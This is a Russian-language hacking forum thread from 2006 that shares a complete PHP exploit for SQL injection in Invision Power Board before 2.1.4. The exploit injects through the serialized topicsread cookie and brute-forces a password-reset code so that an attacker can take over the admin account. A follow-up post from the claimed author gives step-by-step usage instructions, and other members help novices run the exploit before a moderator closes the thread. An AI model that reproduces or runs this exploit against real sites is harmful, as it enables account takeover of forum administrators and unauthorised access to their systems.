Форумы IPB <2.1.4 Admin password SQL-injection Exploit

Discussion in 'Уязвимости CMS/форумов' started by melco, 25 Feb 2006.

Thread Status:
Not open for further replies.
  1. melco

    melco Member

    Joined:
    11 Sep 2005
    Messages:
    11
    Likes Received:
    5
    Reputations:
    2
    IPB <2.1.4 Admin password SQL-injection Exploit

    Нарыл я вот на _http://ru24-team.net/ сплойт их же производства.
    По заявлению ru24-team он должен сбивать пароль заданного юзера... слойт на php, но у меня что-то не запахал...
    Вот код:
    PHP:
    <?
    /*
                       ____   ________
     __________       /____ \/__   __ \
    /__________ \_ _ // _  \ / /  /  \ \
    \\______   \__ __ \/ / // /__/   / /
     \|       _/  |  \  / / \_____  / /
     ||    |   \  |  / / /_____ /  / /
     ||____|___/____/  \______/ \_/ /
     |_________/_____/\_______/\___/
        === - security team - ===

    Invision Power Board < 2.1.4 Password change SQL-Injection Exploit
                              by roOstY
                          Ru24 Security Team
                        <= www.Ru24-Team.net =>
    ----
    For example you can reset password for admin
    (link to "forget Password" add ask to change this password.
    At the end of exploit you get link to change admin password)
    Working in all Invision Power Forum forum before 2.1.4
    but you need good mysql version ;)
    Greetz to Nitrex and Dukenn
    Regards to: Dr_UFO_51,k0pa,NSD,Naikon and other...
    Before runing,you must setup some settings
    WARNING: You must setup the CURL-module for PHP!
    ----
    */

    /* In any case at first you need to change password to  $target if you can't understand that */
    //   error_reporting(E_ALL);

       ############    Settings    ###########################################################

        
    $proxy="24.48.*.*:**"## - your socks 4/5-proxy

        
    $host="http://forum.***.lt";   ##  - target forum
        
    $login="********";             ##  - login to forum
        
    $password="*****";             ##  - pass to forum
        
    $cook_name="ibf_topicsread";   ##  - target cookie name (default: ibf_topicsread)
        
    $topic=22;                     ##  - any real topyc
        
    $target=1;                     ##  - id target to admin or other user  that you want to reset password
        #####
        #  At first you need to reset pasword for target user.
        #   For example you can reset password for admin (link to "forget Password" add ask to change this password. At the end of you get link to change admin password)
        ####
        
    $len=32;  ## 5 for salt        ## it's my
        
    $ver=1;                        ##  if not wor change to 2
        
    $cookie_file_path "/tmp/cookie";    ## for my opinuion, you can to set other
        
    $agent "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)";
       
    ################################################################################

       
    $cookie="";

       echo 
    "Login...";
       
    $url=$host."/index.php?act=Login&CODE=01&CookieDate=1";
       
    $reffer=$host."/index.php?act=Login&CODE=00";
       
    $post['UserName']=urlencode($login);
       
    $post['PassWord']=urlencode($password);
       
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,"");          ###### Login to the forum

       
    $cook=getcookiee($result);
       foreach (
    $cook as $k=>$v) { $cookie[$k]=$v;  }
       if (!
    strstr($result,$login)) {
            echo 
    "error. Invalid Login or Password then Login\n";
            exit;
         }  else echo 
    "done\n";

       echo 
    "Redirecting to main page...";
       
    $url=$host.urldecode(ExtractString($result,$host,"\" "));
       
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"","");          ###### Redirect to the main page

       
    $cook=getcookiee($result);
       foreach (
    $cook as $k=>$v) { $cookie[$k]=$v;  }

        if (!
    strstr($result,$login)) {
            echo 
    "error. Invalid Login or Password then Redirect\n";
            exit;
         }  else echo 
    "done\n";
       
    $reffer=$url;


       echo 
    "Going to Control Panel...";
       
    $url=$host."/index.php?act=UserCP&CODE=00";
       
    $reffer="";$agent="";
       
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"","");             ###### Go te the control panel
           
    $cook=getcookiee($result);
           foreach (
    $cook as $k=>$v) { $cookie[$k]=$v;  }

        if (!
    strstr($result,$login)) {
            echo 
    "error. Invalid Login or Password then going to Control\n";
            exit;
         }    echo 
    "done\n";



        echo 
    "Get table prefix...";
              
    $arr[$topic]=1111111111;
              
    $arr['-1) andd']=$topic;

          
    $cookie_base="";
          foreach ( 
    $cookie as $k=>$v ) { $cookie_base.= $k."=".$v."; "; }

              
    $cookie_add=$cookie_base.$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);

              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              if (!(
    strstr($result,"Error"))) {
                   echo 
    "error. Target seems not vuln";
                   exit;  }
              
    $pref=ExtractString($result,"SELECT * FROM ","topics");
              echo 
    "done prefix: ".$pref."\n";

    $al="";
    echo 
    "Checking Mysql version....";
    $targval=explode(".",$target);
              
    $arr[$topic]=1111111111;
              
    $arr['-1) and @@version<4/*']=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              if (!
    strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4 - GOOD!\n";
                  else { echo  
    "done Mysql ver < 4. We can use only dos\n";
                         exit;
                }
    echo 
    "Exploiting....";

               
    $sent='%61%3A%32%3A%7B%73%3A';
              if (
    $ver==1$exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,0,0,0,1,0,0,0,0,0,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*";
                      else 
    $exp="-999) UNION SELECT 0,vid,null,'open',0,1,1132440935,1,11132440935,0,null,null,0,0,2,2,1,0,0,null,null,0,0,1,0 from ".$pref."validating where member_id=".$target." LIMIT 1/*";

              
    $arr[$topic]=1111111111;
              
    $arr[$exp]=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              if (!
    strstr($result,"different number of columns"))            {
                echo 
    "done\n";
                
    $vid=substr($result,strpos($result,"</a></span>")-32,32);
                echo 
    "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".$vid."] and change user password!\n";
               } else {
                 echo 
    "bad  Can't find number of colums\n";
                }
    echo 
    "Checking Mysql version 2....";
    $targval=explode(".",$target);
              
    $arr[$topic]=1111111111;
              
    $arr['-1) and @@version<4.1/*']=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              
    //echo $result;exit;
              
    if (!strstr($result,"showtopic=".$target)) echo "done Mysql ver > 4.1 - GOOD!\n";
                  else { echo  
    "done Mysql ver < 4.1. We can't use SUBSELECT\n";
                         exit;
                }
    echo 
    "Bruteforcing....\n";
          
    $val="";
    for (
    $j=16;$j<=$len;$j++) {
         
    $a2=128;
         
    $a1=32;
        while ((
    $a2-$a1)>=5) {
              
    $s=round(($a1+$a2)/2,0);
              echo 
    $s;
              
    $arr[$topic]=1111111111;
              
    $arr['-1) and '.$s.'>(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              unset(
    $arr);
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
              if ((
    strstr($result,"Error"))) {
                   echo 
    "Error querry!\n";
                   exit;
                 }
              if (
    strstr($result,"showtopic")) $a2=$s; else $a1=$s;
         }
         for (
    $i=$a1;$i<=$a2;$i++) {
              echo 
    $i;
              
    $arr[$topic]=1111111111;
              
    $arr['-1) and '.$i.'=(select ord(substring(vid,'.$j.',1)) from '.$pref.'validating where member_id='.$target.' LIMIT 1)/*']=$topic;
              
    $cookie_add=$cookie_base."; ".$cook_name."=".urlencode(serialize($arr));
              
    $result=querry($url,$agent,$proxy,$reffer,$cookie_file_path,"",$cookie_add);
             
    // echo urlencode(serialize($arr)).$result;exit;
              
    if (strstr($result,"showtopic"))  {
                  
    $val .= chr($i);
                  echo 
    " - Get_symb:[".$j."] ".chr($i)."\n";
                  break;
                }
         }
     }
     echo 
    "Done\nGoto url: [".$host."/index.php?act=Reg&CODE=lostpassform&uid=".$target."&aid=".strtolower($val)."] and change user password!\n";

    function 
    getcookiee($result) {
       
    $res explode("\n",$result);
       foreach (
    $res as $k=>$v ) {
        if (
    ereg("Set-Cookie",$v)) {
          
    $c_a explode(";",trim(str_replace("Set-Cookie:","",$v)));
          foreach (
    $c_a as $k=>$v ) {
                  if (!(
    ereg("expires",$v))) {
                   
    $arr=explode("=",trim($v));
                   
    $cook[trim($arr[0])]=trim($arr[1]);
                  }
              }
        }
      }
    return 
    $cook;
    }
    function 
    querry($url,$agent,$proxy,$reffer,$cookie_file_path,$post,$cookie) {
           
    $ch curl_init ();
           
    curl_setopt ($chCURLOPT_URL$url);
           
    curl_setopt($chCURLOPT_USERAGENT$agent);
           
    curl_setopt($chCURLOPT_SSL_VERIFYHOST,  0);
           
    curl_setopt($chCURLOPT_SSL_VERIFYPEERfalse);
           if (
    $post!="") {
                    
    curl_setopt($chCURLOPT_POST1);
                    
    curl_setopt($chCURLOPT_POSTFIELDS$post);
                 }
           
    curl_setopt ($chCURLOPT_TIMEOUT120);
           
    curl_setopt ($chCURLOPT_PROXY$proxy);
           
    curl_setopt ($chCURLOPT_PROXYTYPECURLPROXY_SOCKS5);
           
    curl_setopt ($chCURLOPT_RETURNTRANSFERTRUE);
           
    curl_setopt ($chCURLOPT_FAILONERRORfalse);
           
    curl_setopt ($chCURLOPT_FOLLOWLOCATION1);
           
    curl_setopt($chCURLOPT_REFERER$reffer);

           if (
    $cookie!="")
                           
    curl_setopt($chCURLOPT_COOKIE$cookie);
    //                   else {
                            
    curl_setopt($chCURLOPT_COOKIEFILE$cookie_file_path);
                            
    curl_setopt($chCURLOPT_COOKIEJAR$cookie_file_path);
    //                        }
           
    curl_setopt($chCURLOPT_HEADER1);
           
    $result curl_exec($ch);
           
    $error=curl_errno($ch);
           
    curl_close ($ch);
           if (
    $error$result="Fucking Error: ".$error."\r\n";
           if (
    $error==7$result=$result." Failed to connect() to host or proxy.\r\n";
           if (
    $error==28$result=$result." Operation timeout. The specified time-out period was reached according to the conditions.\r\n";
           if (
    $error==22$result=$result." Sorry, Unable to process request at this time, Please try again later.\r\n";
           return 
    $result;
    }

    function 
    ExtractString($str$start$end) {
      
    $str_low = ($str);
      if (
    strpos($str_low$start) !== false && strpos($str_low$endstrpos($str_low$start)) !== false) {
       
    $pos1 strpos($str_low$start) + strlen($start);
       
    $pos2 strpos($str_low$end,strpos($str_low$start)) - $pos1;
       return 
    substr($str$pos1$pos2);
      }
    }
    ?>
    Настройки я поменял... все точно. php5-curl поставил, а оно мне только:
    Loading...
    И все...
    Запускал через
    [root@host]~/$php sploit.php
    Loading...[root@host]~/$
    И все.

    У кого какие идеи?
     
    #1 melco, 25 Feb 2006
    Last edited: 25 Feb 2006
  2. ilyha

    ilyha Elder - Старейшина

    Joined:
    10 Nov 2005
    Messages:
    48
    Likes Received:
    1
    Reputations:
    0
    По многочисленным просьбам решил описать суть уязвимости, используемой эксплоитом, как пользоваться эксплоитом, а так же почему эксплоит может не срабатывать.

    Уязвимость в виде sql-injection в форуме Invision Power Board была найдена в начале января, (точнее даже две, но одна некритическая в календаре, и адвис на нее был опубликован чуть раньше http://ru24-team.net/advisories/ru24_ipb213.txt ) и в то вребя работала на всех версиях форума ИПБ.
    Уязвимость касалась неправильной обработки массива, в параметрах cookie.
    Переменная topicsread в куках, попадает в массив, который соответствующим образом обрабатывается, но проверка на правильность ввода отсутствует.
    Переменная topicsread содержит в себе список просмотренных тем и выглядит примерно так:
    topicsread=a%3A1%3A%7Bi%3A5%3Bi%3A1140956642%3B%7D ;
    Данная переменная используется в нескольких разных местах форума, но реализовать эксплоит для этой уязвимости удалось только в Панели Управления пользователя. Для того, чтобы попасть в Панель управленя необходимо сперва зарегистрироваться на форуме и в эксплоите подставить соответствующие значения логина и пароля на форум.
    Попробуйте просмотреть любой топик на форуме, после этого зайти в Панель Управления и у вас появится список Recently Read Topics (Недавно Прочитаные Сообщения). Вот этот список как раз и содержит переменная topicsread, точнее айди топиков из базы, что можно увидет применив функцию php unserialize():
    $ser=unserialize(urldecode("a%3A1%3A%7Bi%3A5%3Bi%3A1140956642%3B%7D"));
    foreach ($ser as $k=>$v) echo $k.":".$v."<br>";
    В итоге получим:
    5:1140956642
    Это означает, что я смотрел тему под номером 5. 1140956642 - время, когда я смотрел тему, в юникс формате. При разборе этого массива айди темы не фильтруется и попадает вместе с запросом в базу то, что мы туда вставим.
    Не забываем после просмотра топика вставить его айди в эксплоит. Т.е. здесь $topic необходимо установить в 3.
    Но реализация данной уязвимости оказалось нетривиальной, т.к. по стандартной методике было очень сложно отследить, выполняется ли условие в поле юнион или там ошибка.
    Основная проблема при реализации эксплоита - то что очень трудно отличить различные запросы к базе. т.е. подзапрос с условием where 1=1 и where 1=2 часто возвращает совершенно одинаковую страницу - и это пожалуй единственная причина (кроме естественно патчей), по которой эксплоит не срабатывает на некоторых форумах. Такое поведение зависит от версии форума и от версии базы данных. (может и от других - невыявленных мной факторов).
    Кроме того необходимо помнить, что имя переменной topicsread опционально, т.е. задается администратором при настройке форума.
    Написаный мной эксплоит старается получить из базы код, который необходим для изменения пароля пользователя. Естественно, чтобы этот код появился в базе, необходимо инициировать смену пароля, путем востановления забытого пароля. Т.е. вы выбираете, к какому пользователю вы хотите востановить пароль, к примеру пользователь admin с id=3 и административными правами. В эксплоите target необходимо установить в 3.
    Далее идете на страницу ввода пароля и жмете на линк I've forgotten my password! Click here!. Заполняете необходимые поля и код для изменения пароля будет записан в базу, а так же выслан на емаил пользователя admin. После этого можно запускать эксплоит, который постарается узнать этот код, с помощью которого вы сможете изменить пароль пользователя admin. Если этот пользователь обладает административными правами, то нично не помешает нам зайти в Административную Панель Управления=).
    При написании эксплоита я пошел двумя путями:
    1 - подстановка своих значений через запрос union
    Путем долгих исследований удалось определить набор полей которые должны участвовать в запресе union, чтобы вместо названия топика выдавался код, необходимый для востановления пароля. Но проблема в том, что в разных версиях форума, с разными дополнительными модулями - список полей может сильно различается. Поэтому эксплоит через юнион срабатыват только на дефолтной установке форума версии 2.1.3, и то не всегда. Зато теоретически должен срабатывать на всех версиях форума до 2.1.4 и при версии базы mysql 4.0 и выше.
    2 - использование подзапросов
    Подзабросы поддерживаются в mysql с версии 4.1, что резко сужает число успешных срабатываний, зато практически на любом форуме версии 2.*, стоящем на такой версии базы, можно получить код для подтверждения пароля. Данный код имеет длину 32 символа и в данном случае подбирается посимвольно. Причем для подбора одного символа требуется от 5 до 9 запросов к форуму. Поэтому в зависимости от скорости соединения необходимо от 2 до 20 минут для получения необходимого кода.

    ну вот вроде и все. Если что непонятно, то попробуйте разобраться в коде эксплоита, а потом задать вопросы на форуме.

    ЗЫ: В интернете могут встретиться различные версии эксплоита, например с реализацией только первого или только второго метода, или оба метода сразу.
    (c)Автор сплойта.
     
  3. RaptoR

    RaptoR New Member

    Joined:
    30 Oct 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Работает на 2.1.3 на ура (Русская версия 2.1.3 не патченная)
    Invision Power Board v2.1.1 тоже работает
     
    #3 RaptoR, 1 Mar 2006
    Last edited: 1 Mar 2006
  4. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
    Как пользоваться пхп сплоитом? перл я ещё понимаю но пхп до меня не доходит.
     
    #4 Sprinter, 2 Mar 2006
    Last edited: 2 Mar 2006
  5. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Ставишь апач или иис, ставишь пхп, ставишь cURL и пользуешься. Хотя может и бред сказал, пьян маленько. ;)
     
  6. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
    Поставить локально тоесть? Денвер подойдёт или где скачать этот апач?
    Это как?
     
  7. ilyha

    ilyha Elder - Старейшина

    Joined:
    10 Nov 2005
    Messages:
    48
    Likes Received:
    1
    Reputations:
    0
    Скачиваешь денвер вот отсюда _http://www.denwer.ru/dis/Base/Base_2005-10-07_a1.3.31_p4.4.0_m4.1.8_pma2.6.1.exe

    Там и перл и ПХП и все что надо ;)
     
  8. podkashey

    podkashey С крышкой по жизни!

    Joined:
    18 Jun 2005
    Messages:
    756
    Likes Received:
    351
    Reputations:
    353
    Вроде ответили уже. ;)
     
  9. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
    Денвер у меня есть.
    Вот что я делаю
    копирую данный текст в блокнот, сохраняю как php. Потом этот файл кидаю в папку денвера откуда можно запустить файл. Включаю денвер, лезу на этот файл, выводит бредятину, сплошные ошибки.
     
  10. RaptoR

    RaptoR New Member

    Joined:
    30 Oct 2005
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Ошибки в студию
     
  11. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
    Чё оно мне говорит понятия не имею.
     
  12. Morph

    Morph Пирожок с Маком

    Joined:
    13 Aug 2004
    Messages:
    790
    Likes Received:
    113
    Reputations:
    169
  13. Sprinter

    Sprinter New Member

    Joined:
    12 Jan 2006
    Messages:
    25
    Likes Received:
    1
    Reputations:
    -1
    А чё оно то от туда пытается открыть? Как сделать?
     
  14. Azazel

    Azazel Заведующий всем

    Joined:
    17 Apr 2005
    Messages:
    918
    Likes Received:
    213
    Reputations:
    154
    Извините. Почитал об чем вы.. Как вам не стыдно?
    Тема закрыта. Как устанавливать денвер - лежит с денвером.
    Тема закрыта.
     
    #14 Azazel, 5 Mar 2006
    Last edited: 5 Mar 2006
Thread Status:
Not open for further replies.